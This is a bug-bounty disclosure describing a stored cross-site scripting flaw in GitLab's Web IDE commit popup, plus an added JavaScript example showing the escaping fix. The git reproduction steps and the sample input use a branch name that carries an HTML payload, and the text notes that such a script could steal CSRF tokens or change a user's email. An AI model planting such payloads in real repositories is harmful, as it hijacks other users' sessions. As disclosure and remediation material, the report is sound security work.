Stored XSS in Branch-name when committing to branch from Web IDE
Link: https://hackerone.com/reports/365079 By: @fransrosen
The following steps reproduce the issue:

```
git init
echo "hej" > test
git remote add origin git://gitlab-repo
git checkout -b '<img/src='x'/onerror=alert(document.domain)>'
git add .
git commit -m "test"
git push origin '<img/src='x'/onerror=alert(document.domain)>'
```
Then go to the file in the branch named
`<img/src='x'/onerror=alert(document.domain)>` in GitLab, open it with the "Web IDE" and edit it. The Commit button should show up:
Here's a video showing the scenario:
Properly sanitize the branch name in the Commit-popup.
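As an added illustration of that remediation (example code, not GitLab's own), the following shows a commit-dialog renderer that interpolates the branch name raw next to one that HTML-escapes it first, with a small check that the rendered markup contains only the dialog's own tags. The function names escapeHtml, renderCommitTarget, renderCommitTargetUnsafe and containsOnlyExpectedTags are hypothetical; the sample branch name is the one from the report.

```javascript
// Added example (not GitLab's code): rendering an attacker-controlled
// branch name into a commit dialog. Function names are hypothetical.

// Escape the five characters that matter in an HTML text or attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[c]);
}

// Vulnerable pattern: the branch name is dropped into markup as-is,
// so a branch name containing a tag becomes part of the DOM.
function renderCommitTargetUnsafe(branch) {
  return `<p>Commit to <strong>${branch}</strong></p>`;
}

// Fixed pattern: escape before interpolating. The branch name is still
// displayed verbatim to the user, but can no longer introduce markup.
function renderCommitTarget(branch) {
  return `<p>Commit to <strong>${escapeHtml(branch)}</strong></p>`;
}

// Constructed sample input: the branch name used in the report.
const BRANCH = "<img/src='x'/onerror=alert(document.domain)>";

// Defensive check usable in a unit test: every tag in the rendered HTML
// must be one of the tags the template itself emits.
function containsOnlyExpectedTags(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.every((t) => /^<\/?(p|strong)>$/.test(t));
}

// Stand-alone run: the unsafe renderer leaks the <img> tag, the safe one does not.
console.log(containsOnlyExpectedTags(renderCommitTargetUnsafe(BRANCH))); // false
console.log(containsOnlyExpectedTags(renderCommitTarget(BRANCH)));       // true
```

When the dialog is built directly in the browser DOM rather than from a string template, the equivalent fix is to assign the branch name with `element.textContent` (or pass it as a text node) instead of `innerHTML`, which removes the need for manual escaping at that sink.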
The stored XSS triggers for anyone, also triggers on gitlab.com, and can trigger on public repos. You could easily build a PoC that modifies the email address of the current user or steals their CSRF token as soon as the script triggers, or that steals information about the user's other private repositories.
Regards, Frans Rosén